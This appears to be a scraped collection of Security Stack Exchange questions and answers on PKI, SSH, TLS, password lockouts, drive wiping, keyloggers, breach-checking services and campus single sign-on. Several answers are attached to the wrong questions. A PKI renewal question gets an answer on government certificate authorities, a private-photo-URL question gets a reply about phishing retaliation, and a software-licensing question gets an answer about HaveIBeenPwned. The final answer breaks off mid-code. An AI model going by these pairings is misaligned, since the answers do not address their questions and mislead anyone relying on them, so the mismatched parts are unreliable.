200,726 | I want to build a PKI (public key infrastructure) to host certificates for users. My use case is, that I want to use the certificates for e2e encryption between the users. Users must be able to download valid certificates for a random user. (sharing is initiated by the sender) Certificates must still be valid, even if the receiver did not log in for a long time. (in theory months, years) For that to work, the user has to send me a CSR (certificate signing request) I have to check the CSR for validity I create the certificate with the CSR and my intermediate signing certificate Now I want to prolong the existing certificate. For that I could store the CSR in the database and just repeat step 3. Is this a good idea? (I have the feeling that it is not, but I cannot pinpoint the exact issue with this.) If not, what are good and reliable alternatives? (e.g. I want to keep the certificate valid, even if the user does not log in for a longer time) | If your adversary is a powerful nation-state threat actor, web PKI will not protect you. Nothing is preventing them from issuing their own certificate. In fact, many governments run their own certificate authorities, such as the US FPKI and affiliates . See a list of CAs currently trusted by Firefox: Government of France Government of Hong Kong (SAR), Hongkong Post Government of Japan, Ministry of Internal Affairs and Communications Government of Spain, Autoritat de Certificació de la Comunitat Valenciana (ACCV) Government of Spain (CAV), Izenpe S.A. Government of The Netherlands, PKIoverheid Government of Taiwan, Government Root Certification Authority (GRCA) Government of Turkey, Kamu Sertifikasyon Merkezi (Kamu SM) While Firefox currently refuses to trust the US FPKI, it still trusts many other government-run CAs, and a sophisticated nation-state actor absolutely has access to some existing, commercial CAs. Chrome, Internet Explorer, and Edge use the system trust store which, for Windows, does include many government certificate authorities, including the US FPKI. Any of these could be used to sign a valid certificate for any website and your browser would happily trust them without batting an eye. While the new and experimental standard for Certificate Transparency (CT) helps reduce the impact of mistakenly-issued certificates, it does not protect against a dedicated attacker who controls a malicious CA. Once it has seen greater adoption it may, however, make it easier to spot malicious or misbehaving CAs after a short period of time, but it will not prevent the attack immediately as it is performed. Some browsers use certificate pinning where important and high-profile domains are validated against a hardcoded list of permitted certificate authorities. Signing a fraudulent certificate for those domains would require compromising the CA that they currently use. Unfortunately, this only applies to a small handful of domains and does not protect the web at large. A partial solution would be to refuse to trust a domain without the .gov TLD whose certificate was issued by a government CA, which could be implemented client-side, but it would likely have little real-world impact. An adversarial government is not going to sign a malicious website with a state-run CA, since that would immediately attribute the attack to them. Rather, they would exploit covert relationships with existing CAs to trick them or force them into signing the certificate. 
CT, as mentioned in the previous paragraph, would detect this and the attack would be quickly noticed, but it does not prevent it. | {
"source": [
"https://security.stackexchange.com/questions/200726",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/195877/"
]
} |
200,792 | I have a web server set up and would like to connect to it from outside using Tor.
The web server simply serves up a simple webpage that will act as an interface for a program running on the machine.
It is not meant to be accessible by anyone else. If I set up another computer with SSH, configured to log in using SSH keys, to act as an SSH tunnel, is this secure enough against most attackers?
What attacks are still possible and how do I defend against them? | If you are using public key authentication for SSH, no one can log in to the server without having the corresponding private key. This is as secure, and usually more secure, than password authentication. The encryption OpenSSH provides is state of the art; there is no known way to break it. You can further improve security on the Tor side by using authorized hidden services . This will make the domain inaccessible to all but your client. Note that this only works with v2 hidden services, not the latest v3. Since v2 has been deprecated, this is unfortunately no longer possible. The only remaining attack would be a man-in-the-middle attack. You can copy over the host key from the server to your client, just like you copied a key to make public key authentication possible. This will completely mitigate MITM attacks and the client will warn you if an attempt is detected. See also What is the difference between authorized_keys and known_hosts file for SSH? | {
"source": [
"https://security.stackexchange.com/questions/200792",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/183895/"
]
} |
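To make the host-key advice in the answer above concrete, here is a hedged sketch with the third-party paramiko library: the client loads a known_hosts file copied from the server out of band and rejects any other host key, which is what stops a man-in-the-middle at the SSH layer. The host name and file paths are examples, and the Tor transport itself (a SOCKS-wrapped socket passed via the sock parameter) is left out of the sketch.

# Sketch: SSH client that only trusts a host key previously copied from the
# server, mirroring OpenSSH's known_hosts behaviour. Third-party: paramiko.
import paramiko

client = paramiko.SSHClient()
client.load_host_keys("/home/me/.ssh/known_hosts")            # copied out of band
client.set_missing_host_key_policy(paramiko.RejectPolicy())   # never accept unknown keys

client.connect(
    "server.example.org",                        # example host
    username="webadmin",
    key_filename="/home/me/.ssh/id_ed25519",     # public key authentication only
)
_, stdout, _ = client.exec_command("uptime")
print(stdout.read().decode())
client.close()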
201,033 | My iPhone was stolen a couple of weeks ago and I started receiving the following messages on my recovery secondary number that I provided with Find My iPhone: The URLs are: https://apple.inc-view.us/?auth=3455 https://apple.inc-locate.us/verify.php?ID=&auth=325&vr= And they mimic the interface of Find My iPhone where they're asking me for my Apple ID credentials. I logged into Apple ID and the phone hasn't registered since it was stolen. Wondering if there's something I can do to track them down or be mean to them. | Offensive defense is the type of attack you are looking to perform. You have been the victim of a technological crime, you are the target of a phishing campaign, and you want to get even. This is a very normal response and I can tell you that many organizations, governments, and individuals attempt this on their own daily. There is a major issue with any type of non-legal recourse, however. Due to the anonymity of the internet, and the relative ease of using a botnet to do malicious activity, it can be really difficult to assure that you only hurt the people you intend to hurt. In attacking an individual through a network relay, you may end up shutting down your own grand mother's computer which is less than ideal and totally irrelevant to the initial attackers. The only truly legal recourse is to co-ordinate with your local authorities and attempt to gain information back on the attackers. If you can glean any information from your cowardly attackers that may indicate name or location you can use this to work with the authorities. Also, if the phone is on, you can still attempt to use the "Find My Phone" feature to track down it's current location alongside the proper authorities (I do not recommend confronting thieves on your own or without legal support). In the end, it really sucks that you're in this position and I have compassion for you. Know that your options are limited, but do take advantage of the ones you can so you have the peace of mind knowing you did all you could legally do. That will be far better than putting your self in the position of risking jail time over a device. | {
"source": [
"https://security.stackexchange.com/questions/201033",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/196245/"
]
} |
201,037 | On sites like Facebook etc. you have the ability to create "private" photo albums that are only shared with selected friends, similarly in Messenger you can upload an image just to a specific chat. In the context of privacy and security on a social network, I'm assuming most people think these images etc. are secured. But are they? Am I right in assuming that actually the security comes from the fact that an uploaded image just has some kind of extremely hard to guess guid that forms the url? The fact that an album is hidden, therefore projects the urls for it's contained images being seen, but if someone had the URL for a specific image they could view it regardless. I know you can use scripts that generate an image (e.g a php script) whereby the image itself doesn't have an actual URL and is above the document root, but is more of $_GET parameter and the script could therefore enforce security. But something the scale of Facebook and Google where you would be relying on CDNs to deliver this content, a script handler for every image doesn't seem viable. Am I right in assuming it's actually just security through obfuscation? Or do these sites employ some kind of sophisticated ACL to actually control access to individual images? How should this be handled in the context of social networks e.g more image based then truly sensitive files? (though obviously an image itself could be sensitive to the uploader) | Offensive defense is the type of attack you are looking to perform. You have been the victim of a technological crime, you are the target of a phishing campaign, and you want to get even. This is a very normal response and I can tell you that many organizations, governments, and individuals attempt this on their own daily. There is a major issue with any type of non-legal recourse, however. Due to the anonymity of the internet, and the relative ease of using a botnet to do malicious activity, it can be really difficult to assure that you only hurt the people you intend to hurt. In attacking an individual through a network relay, you may end up shutting down your own grand mother's computer which is less than ideal and totally irrelevant to the initial attackers. The only truly legal recourse is to co-ordinate with your local authorities and attempt to gain information back on the attackers. If you can glean any information from your cowardly attackers that may indicate name or location you can use this to work with the authorities. Also, if the phone is on, you can still attempt to use the "Find My Phone" feature to track down it's current location alongside the proper authorities (I do not recommend confronting thieves on your own or without legal support). In the end, it really sucks that you're in this position and I have compassion for you. Know that your options are limited, but do take advantage of the ones you can so you have the peace of mind knowing you did all you could legally do. That will be far better than putting your self in the position of risking jail time over a device. | {
"source": [
"https://security.stackexchange.com/questions/201037",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/41211/"
]
} |
201,106 | This question indicates parents are to buy laptops for a school to install software and certificates. I am seeking to understand reasons for site certificates installation: Why would site certificates be installed? What is the potential for issues with the practice? I am seeking to understand both legitimate (constructive) reasons for certificates and potential for misuse / abuse. It is unclear from the thread how schools could somehow decrypt traffic with certificates. | There are two different kinds of certificates you could install on a machine: The first type of certificate is root certificate authority. A root certificate contains just a public key of the certificate authority. A root certificate is a trust anchor that is installed in your machine so that your machine can identify "trusted" sites to connect to, a certificate authority can issue a claim in the form of a server certificate that "X is owner of domain Y" and because your machine trusts the root certificate authority, it'll trust that claim. If the school/company installs a root certificate to your machine, your machine will trust whatever connections made to the school/company's server thinking that it is legitimate. If you install a root certificate, the school/company would be able to intercept any SSL/TLS connections made by your machine that runs through their network without triggering browser certificate errors/warning . The second type of certificate is client certificate. A client certificate contains a private key that is unique to you and a certificate signed by the school/company's certificate authority. A client certificate is used for your machine to authenticate to the school's infrastructure, proving that it is you that is connecting. A client certificate is used as essentially a better solution to authentication credential than having to remember passwords. A client certificate cannot be used by the school/company to eavesdrop on connections made by your machine to servers that aren't owned by the school/company. A client certificate is fine to install and shouldn't cause any security concerns. In contrast, be very wary of installing a root certificate, as it is a cause for concern as the root certificate can easily be abused. | {
"source": [
"https://security.stackexchange.com/questions/201106",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/115653/"
]
} |
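A hedged sketch of how you could tell the two certificate types from the answer above apart before installing anything, using the third-party cryptography package; the file name is an example and the checks are simplified (a client certificate you receive would normally arrive as a PKCS#12 bundle that also contains the private key).

# Sketch: inspect a certificate and report whether it is a CA certificate
# (a trust anchor that can vouch for arbitrary sites) or an ordinary
# client/leaf certificate. Third-party: cryptography.
from cryptography import x509
from cryptography.x509.oid import ExtendedKeyUsageOID

with open("school-provided.crt", "rb") as f:       # example file name
    cert = x509.load_pem_x509_certificate(f.read())

print("Subject:", cert.subject.rfc4514_string())
print("Issuer: ", cert.issuer.rfc4514_string())

try:
    is_ca = cert.extensions.get_extension_for_class(x509.BasicConstraints).value.ca
except x509.ExtensionNotFound:
    is_ca = False

if is_ca:
    print("CA certificate: installing it lets the issuer vouch for any website.")
else:
    try:
        eku = cert.extensions.get_extension_for_class(x509.ExtendedKeyUsage).value
        if ExtendedKeyUsageOID.CLIENT_AUTH in eku:
            print("Looks like a client-authentication certificate (generally harmless).")
    except x509.ExtensionNotFound:
        pass
    print("Not a CA certificate.")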
201,117 | I have a server which I am accessing via SSH. I only allow authentication with a private key. Normally, when I log in via PuTTY, I am first asked for the username and then for the passphrase for the key. Out of curiosity I created a new private key, which should be invalid for my user, and I also put a passphrase on it. To my surprise, once I provided the username, the key I attempted to log in with was refused by my server before I was ever asked for the passphrase. I am wondering how the SSH server can know that the private key is incorrect if the passphrase for it hasn't been provided yet? | While you've encrypted the private key, the public key is still readable. SSH authentication with the "publickey" method works by having the client send each potential public key to the server; the server then responds telling the client which key is allowed. If one of the keys is allowed, the client must decrypt the private key to sign a message, proving ownership of the private key. In your experiment, the server responded saying that none of the provided keys was allowed for your username, so there was no need to decrypt a private key; authentication had already failed. | {
"source": [
"https://security.stackexchange.com/questions/201117",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/102283/"
]
} |
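A toy sketch of the server-side step described in the answer above: deciding whether an offered public key is allowed needs nothing but the public key blob, which is why a non-matching key is refused before any passphrase ever comes into play. Standard library only; file paths are examples and authorized_keys option prefixes are ignored for brevity.

# Sketch: the "is this key allowed?" check. It compares the offered public key
# against authorized_keys entries; no private key or passphrase is involved.
def allowed_keys(path="authorized_keys"):
    keys = set()
    with open(path) as f:
        for line in f:
            parts = line.strip().split()
            # entries look like: <keytype> <base64-blob> [comment]
            if len(parts) >= 2 and not parts[0].startswith("#"):
                keys.add((parts[0], parts[1]))
    return keys

def is_key_allowed(offered_type, offered_blob, path="authorized_keys"):
    return (offered_type, offered_blob) in allowed_keys(path)

# The client reads the same two fields from its unencrypted id_*.pub file and
# offers them first; only when the server answers "allowed" does the client
# need the passphrase to decrypt the private key and produce a signature.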
201,210 | On https://passwordsgenerator.net/ , it says Examples of weak passwords: qwert12345, Gbt3fC79ZmMEFUFJ, 1234567890, 987654321, nortonpassword The first, third, and fourth examples are obviously weak. I can't, however, see what's weak about the second one. Indeed, the only problem I see with it at the moment is that it doesn't have any special symbols. Is that enough for a password to be considered weak ? | I was curious about the same thing, so I put Gbt3fC79ZmMEFUFJ into Google, and lo! and behold it found something that wasn't just a paraphrase of "Don't use this password" advice — the password itself was embedded in example source code that showed how you could send a password to a server! ( link to page , and screenshot below) So I think the real goal of that advice is not that Gbt3fC79ZmMEFUFJ is a mysteriously weak password because of the keyboard layout or because of low entropy or because it doesn't include symbols or Unicode or emoji or whatever: It's simply to remind you that you should never use a password that's been published somewhere, especially one published as an "example" password! [ Update: This is intentionally a screenshot and not simply a code snippet; the content of the code is far less important than seeing how it appeared verbatim on somebody's website! ] | {
"source": [
"https://security.stackexchange.com/questions/201210",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/196427/"
]
} |
201,257 | Working with a non-profit organization,it's common to reuse hard drives that have previously stored highly sensitive information such as medical and financial records. This is primarily driven by cost-saving measures to reduce purchasing new hard drives. If the destruction of sensitive information is the first requirement, does this limit the choice in selecting the type of storage medium? For example, do non-flash based devices provide a higher level of assurance in the destruction of data using ATA Secure Erase and a single wipe in comparison to SSDs including self-encrypting drives? | Data destruction is a technique of last resort. If you are planning to use a new storage device, you should use full disk encryption. This allows you to either destroy the encrypted master key or simply forget the password, effectively rendering all data unrecoverable, despite no data actually being wiped. Encryption is a solution for both solid state and standard hard drives. Use a strong algorithm like AES. If you absolutely need to use a hard drive without full disk encryption, you should get one which supports SED , which is transparent hardware encryption. SED transparently encrypts all data written to the drive, but keeps the encryption key stored in a special area. When you initiate secure erasure, this key is all that is destroyed. This feature is supported on most modern SSDs and HDDs. If you do not know if a drive supports it, you can often conclude that it is supported if the estimated ATA Secure Erase time is showing as only two minutes , regardless of how large the drive itself is. There is nothing intrinsic to the data storage methods used by solid state media that makes it hard to perform data destruction, but their firmware makes it impossible for the operating system to overwrite specific sectors due to wear leveling, a feature that spreads writes around the drive to decrease the wear and tear on individual flash cells (each of which has a finite lifespan). This does mean that you cannot overwrite data on SSDs reliably. You can still use SED if the drive implements it, and you can use ATA Secure Erase as well, but if you need to manually overwrite a range of sectors, use an HDD. Note that, if you do use an SSD and are using full disk encryption and you have TRIM enabled, the drive will leak a limited amount of metadata, as explained in this excellent blog post . You can usually disable TRIM at a small performance penalty, but you will avoid metadata leakage. Whether or not the exact metadata leaked is problematic depends on your specific threat model. | {
"source": [
"https://security.stackexchange.com/questions/201257",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/61038/"
]
} |
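The two-minute hint in the answer above can be read off the drive's identification data; here is a loosely hedged sketch that shells out to hdparm on Linux (run as root). The device path is an example, the exact wording of the output varies between drives, and the parsing below is only a heuristic.

# Sketch: show the Security section of `hdparm -I`, which advertises the ATA
# security feature set and the estimated erase time. A reported "2min" erase
# often indicates a self-encrypting drive that erases by discarding its key.
import subprocess

DEVICE = "/dev/sdX"    # example path - double-check before touching real drives

output = subprocess.run(
    ["hdparm", "-I", DEVICE],
    capture_output=True, text=True, check=True,
).stdout

in_security = False
for line in output.splitlines():
    if line.strip().startswith("Security:"):
        in_security = True
    if in_security and ("ERASE UNIT" in line or "enabled" in line or "locked" in line):
        print(line.rstrip())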
201,429 | Is it safe for an end user to browse a website that only supports TLSv1 (or other insecure ciphers or protocols), given the following: it's a publicly accessible website with no sensitive or private data it doesn't require user login, credentials or any other user data whatsoever. So for all intents and purposes, assume the website is intended to be an http:// site, but has an SSL cert installed on it that's out of date by modern security standards. And by safe, I mean they're not open to some type of exploit, other than MITM of course. By exploit here, I mean there's no way a bad SSL cert could be used to install malware on their machine in anyway, correct? | There is currently no real risk just based on the TLS protocol version for the end user when visiting a site which provides only TLS 1.0 (TLSv1) with a modern browser, i.e. a current version of Chrome, Firefox, Edge or chromium based browsers like Opera. Fortunately browser vendors today actually care about security and if TLS 1.0 would be too insecure it would be switched off or be restricted to only some white-listed sites or only for use with some ciphers. On the other hand: if a site is still offering only TLS 1.0 you might ask yourself how their relation to security is in general. While there might be some sites which knowingly support only TLS 1.0 it is more likely that they use some old systems or setups which is not able to support TLS 1.2 yet. Given that the most commonly used server-side SSL stack OpenSSL has support of TLS 1.2 since version 1.0.1 released in 2012 and that even OpenSSL 1.0.1 is out of support since some time, it is not unlikely that the owners of the site don't really care about security and that the rest of their infrastructure is outdated too. And that should worry you, not the use of TLS 1.0 by itself. | {
"source": [
"https://security.stackexchange.com/questions/201429",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/13524/"
]
} |
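If you want to see for yourself which protocol versions a site still negotiates, here is a short probe using only Python's standard ssl module (3.7+). The host is an example; note that a local OpenSSL build that forbids TLS 1.0/1.1 at its default security level can make a version look rejected even when the server would accept it.

# Sketch: try each TLS protocol version in turn and report what the server
# is willing to negotiate.
import socket
import ssl

HOST = "example.com"   # example host
VERSIONS = [ssl.TLSVersion.TLSv1, ssl.TLSVersion.TLSv1_1,
            ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3]

for version in VERSIONS:
    ctx = ssl.create_default_context()
    ctx.minimum_version = version
    ctx.maximum_version = version
    try:
        with socket.create_connection((HOST, 443), timeout=5) as sock:
            with ctx.wrap_socket(sock, server_hostname=HOST) as tls:
                print(f"{version.name}: accepted ({tls.version()})")
    except (ssl.SSLError, OSError) as exc:
        print(f"{version.name}: rejected ({exc.__class__.__name__})")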
201,449 | My question is about the text that I type on a keyboard while in a web browser. I understand that if the website has HTTPS the connection from my browser to the website is secure/encrypted, but what about the text that I type on the keyboard on the local computer? For example, at an internet cafe, if you open a Chrome window and go to a secure site (HTTPS), is the text that you type on the keyboard secure from the keyboard to the browser? Can key logging software on the local computer access the text? My concern is logging into my email account (or any other private account) on a public computer: can the password that I type be intercepted? If so, is there any way for a user of a public computer to ensure the privacy of their password in this scenario? | No, your data is not safe from key loggers on a local computer. There isn't much more to say here, to be fair. A key logger will grab and save every keystroke entered. The TLS (HTTPS) encryption happens after the keyboard driver sends those keystrokes to the browser, through the key logger. And even if encryption is being used and there isn't one of the many types of spyware on the computer, the connection between the computer and the site might have a man-in-the-middle (MITM) device in between which tricks your computer into thinking it's using encryption when it's not. Good question. Yes, on a public kiosk you run the risk of credential harvesting. I cannot think of anything that would bypass keylogging software (a VPN will fix MITM issues). Beware. | {
"source": [
"https://security.stackexchange.com/questions/201449",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/196995/"
]
} |
201,566 | Some websites display a remaining password retry count when I input wrong passwords more than twice. For example, displaying that there are 3 retries remaining until locking out my account. Is this dangerous from security perspective ? | Locking accounts is a bad idea in the first place. It might seem like you're making your organization more secure by keeping out "bad people" who are "guessing" at passwords using brute force attacks, but what have you really solved? Even with this policy and a perfect userbase who never makes security mistakes, an attacker can perform a denial-of-service attack on your organization by repeatedly using the password "aaa" to lock out the accounts of critical users. Consider what happens if your attacker gets a copy of the list of usernames for your entire IT department: Suddenly, IT itself — the organization that would otherwise be able to unlock other users — is itself completely shut down. Always consider what the threat model is before implementing a policy. A "bad guy" determined to hurt your organization will find alternative attack vectors. Your lockout policy won't even faze a nation-state actor (like Russia or China or the NSA); a determined hacker will just find other ways around it (like social engineering); and it will only hurt legitimate users of your service, no matter how low or high you set the lockout counter. Moral of the story: Don't lock out accounts. Instead, do what Apple does with the iPhone: Each login try doubles the login delay, so that after a dozen failures or so, you have to wait one hour between each successive attempt. That's long enough to prevent "bad guys" from performing brute-force attacks, but still short enough that a legitimate user can spend that hour figuring out what their password was and typing it in properly after lunch — or contacting IT and apologetically asking for help. (Similarly, "flooding" policies can often be implemented at the IP-address level in your firewall, not just at the user-account level in your software, if you're concerned about a dedicated attacker trying to brute-force many different accounts.) And if you don't lock out accounts, you don't need to have a counter — or display it. [ see also: this excellent answer on a similar question ] | {
"source": [
"https://security.stackexchange.com/questions/201566",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/194974/"
]
} |
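A minimal sketch of the doubling-delay idea from the answer above, with an in-memory failure counter per account; a real deployment would persist the counters and probably throttle per source IP as well.

# Sketch: exponential login throttling instead of hard lockout. Each
# consecutive failure doubles the wait before the next attempt, capped at an
# hour; a successful login resets the counter.
import time

MAX_DELAY = 3600          # seconds
_failures = {}            # username -> (failure_count, last_failure_time)

def seconds_until_allowed(username):
    count, last = _failures.get(username, (0, 0.0))
    if count == 0:
        return 0
    delay = min(2 ** (count - 1), MAX_DELAY)
    return max(0, int(last + delay - time.time()))

def record_attempt(username, success):
    if success:
        _failures.pop(username, None)
    else:
        count, _ = _failures.get(username, (0, 0.0))
        _failures[username] = (count + 1, time.time())

# Usage sketch: if seconds_until_allowed(user) > 0, reject with "try again
# later"; otherwise verify the password and call record_attempt(user, ok).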
201,654 | There is a new big case of stolen login/password data in the news . At the same time, I am reading that there are services that let you check if your own login data is affected, e.g. Have I Been Pwned . Is it safe to enter my email address there to find out whether I need to change my passwords? | This question was explained by Troy Hunt several times on his blog, on Twitter and in the FAQ of haveibeenpwned.com See here : When you search for an email address Searching for an email address only ever retrieves the address from storage then returns it in the response, the searched address is never explicitly stored anywhere. See the Logging section below for situations in which it may be implicitly stored. Data breaches flagged as sensitive are not returned in public searches, they can only be viewed by using the notification service and verifying ownership of the email address first. Sensitive breaches are also searchable by domain owners who prove they control the domain using the domain search feature . Read about why non-sensitive breaches are publicly searchable. See also the Logging paragraph And from the FAQ : How do I know the site isn't just harvesting searched email addresses? You don't, but it's not. The site is simply intended to be a free service for people to assess risk in relation to their account being caught up in a breach. As with any website, if you're concerned about the intent or security, don't use it. Of course we have to trust Troy Hunt on his claims, as we have no way of proving that he is not doing something else, when handling your specific request. But I think it is more than fair to say, that haveibeenpwned is a valuable service and Troy Hunt himself is a respected member of the infosec community. But let's suppose we don't trust Troy: what do you have to lose? You might disclose your email address to him. How big of a risk is that to you, when you can just enter any email address you want? At the end of the day, HIBP is a free service for you(!) that costs Troy Hunt money. You can choose to search through all the password databases of the world yourself if you don't want to take the risk that maybe a lot of people are wrong about Troy Hunt, just because then you would disclose your email address. | {
"source": [
"https://security.stackexchange.com/questions/201654",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/197097/"
]
} |
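Related to the disclosure worry in the question above: for passwords (as opposed to email addresses) the same service exposes a publicly documented k-anonymity range endpoint, so you never send the full secret. A standard-library sketch, assuming the endpoint below is still the published one:

# Sketch: Pwned Passwords k-anonymity lookup - only the first five characters
# of the SHA-1 hash ever leave your machine.
import hashlib
import urllib.request

def times_pwned(password):
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    prefix, suffix = digest[:5], digest[5:]
    req = urllib.request.Request(
        "https://api.pwnedpasswords.com/range/" + prefix,
        headers={"User-Agent": "range-check-sketch"},
    )
    with urllib.request.urlopen(req) as resp:
        body = resp.read().decode("utf-8")
    for line in body.splitlines():
        candidate, _, count = line.partition(":")
        if candidate.strip() == suffix:
            return int(count.strip())
    return 0

print(times_pwned("password123"))   # expect a very large number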
201,659 | I'm trying to make a good licensing system without affecting user's experience and at the same to make it as secure as possible. I know it's impossible to make it 100% secure, but I would like to make it harder. My program is made to be used only when the user has internet connection (not because I hate my users, but because my program is for another online app), that's why I don't care if the user doesn't have internet connection. What I thought so far: Registration: User downloads the software from a public permanent link (mega or something). User buys the software and receives a unique key on his mail (this key is then wrote on my DB) User opens the software and registers a new account with Username, Password and the key he received via e-mail. At the same time information about it's pc is sent (will cover that later) (This information is sent with HTTPS POST) API checks if the key is not already used and writes Username, Password and PC information on that key's row. Login: User opens software and writes Username and Password. Username, Password, PC information and Current time is sent to the server (HTTPS POST). Server checks Username, Password and PC information and sends an
answer based on the current time (using echo in PHP) (to make the answer unique;
I don't know if this is useful, see the last question under "What I didn't think about yet").
didn't change. There is a "Reset" button in case the users changed something in their Computers that made the key obsolete. This will ask the user to login, then will replace Computer's information with the new one. Computer information: I'm still thinking about this, maybe Hardware information that cannot be faked, or something. I need all this information to be as hard to fake as possible and not changed so frequently that my users would have to reset their account every day/week. What I didn't think about yet: What happens if the user tries to fake the Computer information, how should the server check that the information is wrong. Like if the key becomes "00000000" because all the data is NULL, empty or 0. What happens if there are 2 Computers with the same information (for example,
notebooks). Users would be able to use same serial / account for both computers. How often will this happen? Answered after investigating. This has a low chance, and if this happens, they would still have to know each other so they share their serial keys. What happens if someone gets the source code of my program? Will it have any consequence on the rest of the users? Answered by @vidarlo Is it possible to fake the answer from the server? What should I do to prevent that? Answered by @vidarlo After thinking about this system I noticed that I don't have any kind of serial key generated from user information. (I mean, I send Computer information to the server to compare instead of making a serial key with it and giving the user this serial key). Does this make my system bad? To be honest, I read a lot and came with this Schema that I "tested" in my mind to see if I find any easy way to bypass (I mean things like "if you block internet connection then the program will work without license"). Now after "testing" it in my mind, I need more experienced users to give me some advice.
This will be my main source of money while I'm studying and I'm trying to protect it as much as possible. A good link I found was how XP license system works: https://www.licenturion.com/xp/fully-licensed-wpa.txt But is not very useful because I don't use any kind of serial key containing user information. I don't know if this is the page for this, I decided to post this here because I'm not asking about code or "how do i do the following", I'm asking if this is easy to bypass. Everything is appreciated, I'm still on the first step (thinking about everything and checking if it fails before I start to code it). I continued researching and couldn't find any problems with this Schema (I'm omitting the problem that someone edits my exe because there is nothing I can do about it) But still I need more opinions because I don't have a lot of experience, and this would be my first licensing system. | This question was explained by Troy Hunt several times on his blog, on Twitter and in the FAQ of haveibeenpwned.com See here : When you search for an email address Searching for an email address only ever retrieves the address from storage then returns it in the response, the searched address is never explicitly stored anywhere. See the Logging section below for situations in which it may be implicitly stored. Data breaches flagged as sensitive are not returned in public searches, they can only be viewed by using the notification service and verifying ownership of the email address first. Sensitive breaches are also searchable by domain owners who prove they control the domain using the domain search feature . Read about why non-sensitive breaches are publicly searchable. See also the Logging paragraph And from the FAQ : How do I know the site isn't just harvesting searched email addresses? You don't, but it's not. The site is simply intended to be a free service for people to assess risk in relation to their account being caught up in a breach. As with any website, if you're concerned about the intent or security, don't use it. Of course we have to trust Troy Hunt on his claims, as we have no way of proving that he is not doing something else, when handling your specific request. But I think it is more than fair to say, that haveibeenpwned is a valuable service and Troy Hunt himself is a respected member of the infosec community. But let's suppose we don't trust Troy: what do you have to lose? You might disclose your email address to him. How big of a risk is that to you, when you can just enter any email address you want? At the end of the day, HIBP is a free service for you(!) that costs Troy Hunt money. You can choose to search through all the password databases of the world yourself if you don't want to take the risk that maybe a lot of people are wrong about Troy Hunt, just because then you would disclose your email address. | {
"source": [
"https://security.stackexchange.com/questions/201659",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/197108/"
]
} |
201,788 | There's a lot of news right now about haveibeenpwned but I don't understand why people need a service like that in first place. If you're a security conscious user, you'd change your passwords regularly on any website that matters (banking, email, paid services) and thus leaks would not affect you in the first place. By 'changing your password' I refer to creating a randomly generated password string for each service, not the enforced changing of passwords in corporate environments. So why are people so interested in using haveibeenpwned? Why not follow the right security practices regardless of any leaks? | Your question contains several false assumption: If you're a security conscious user, you'd change your passwords regularly on any website that matters According to my password manager I have more than hundreds of accounts and most of them would do harm to me if compromised. Changing all of them regularly (like every 90 days) is a huge amount of work. So I use strong passwords generated by the password manager instead. But some services still save passwords in clear text. and thus leaks would not affect you in the first place. Let's say I would change every password every 90 days. There is still the possibility that there are 89 days where my account is compromised and the attacker has time to do anything including changing my password. When you know your account is in the list, you can act instantly. Why not follow the right security practices regardless of any leaks? See previous point. So why are people so interested in using haveibeenpwned? To know which accounts are affected and to figure out which service got hacked/where the accounts came from. With this knowledge: I can change the password instantly. I know which service is less trustworthy for sensitive data, money, ... and I might close my activity at this service. If this service has a messaging system I know to be more alert of messages from "friends" because the account might be stolen. I know which of my data might be compromised (data at the hacked service). | {
"source": [
"https://security.stackexchange.com/questions/201788",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/47028/"
]
} |
201,836 | I'm a student and it seems every school or university I have been to has one password that you set for your user account for logging in to university services, which is also then synced to external services the university use such as blackboard, fronter, dropbox, Office 365 e-mail, etc. Lesson 1 of cybersecurity is not to store passwords in plain text or to encrypt them. But instead to use some sort of hashing algorithm. If this is true how can a university's IT service automatically sync password for all the relevant accounts? I can understand how this can be done by using APIs each time to update all the services when a password change has been requested, but it would then make it impossible to adopt a new service without the user re-entering their password. How is it done? or are they just holding passwords in plain text? | It's usually not that passwords are "synced" between services, but rather a centralized authentication service is used. In many cases, this is going to be a Microsoft Windows domain controller running an Active Directory server (others exist e.g. FreeIPA), which other services can talk to using LDAP and Kerberos. The typical setup has all user accounts added to the directory server (which is usually replicated across multiple servers transparently for redundancy and reliability purposes). Locally hosted applications (e.g. Blackboard) will have the directory server's LDAP information entered into the server settings as an authentication provider. When a client enters their credentials on the web interface, the application may check the credentials against a local database as well as LDAP services that have been configured. If the LDAP server confirms a successful authentication, information about the user (contact info, group membership, etc.) can be retrieved to populate parts of the application. When user information is updated somewhere, the data on the directory server is changed so that the change will be visible everywhere else. This applies to changing the password. Not all applications will use LDAP directly; external services such as Office 365 or Google Apps suite and others may instead use single sign-on (SSO), where you authenticate through your organization's login page and these external services are able to effectively reuse this authentication (e.g. through SAML). On the directory server, passwords are stored as hashes within each user object. The hashes are protected further using LDAP access controls (so any LDAP client can't just pull hashes) and are encrypted with a key from the registry (in the case of Windows Active directory). In short, this is just scratching the surface. There are a number of ways to set up a network and services to use centralized authentication. But almost every organization uses some type of this system; like you said, it would be very difficult and insecure to do manually in most cases. | {
"source": [
"https://security.stackexchange.com/questions/201836",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/197339/"
]
} |
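A hedged sketch of the LDAP step described in the answer above, using the third-party ldap3 package: the application never stores any password, it simply asks the directory server to perform a bind with the credentials the user typed. Server name, base DN and attribute names are examples, and real code must escape the username before putting it in a search filter.

# Sketch: credential check against a central directory (e.g. Active Directory)
# via an LDAP bind. If the bind succeeds, the directory has vouched for the
# password; the application never needs its own copy of any password hash.
from ldap3 import Server, Connection, ALL

def check_credentials(username, password):
    server = Server("dc1.campus.example.edu", use_ssl=True, get_info=ALL)
    user = f"{username}@campus.example.edu"        # UPN-style login name
    conn = Connection(server, user=user, password=password)
    if not conn.bind():
        return None                                # wrong password or unknown user
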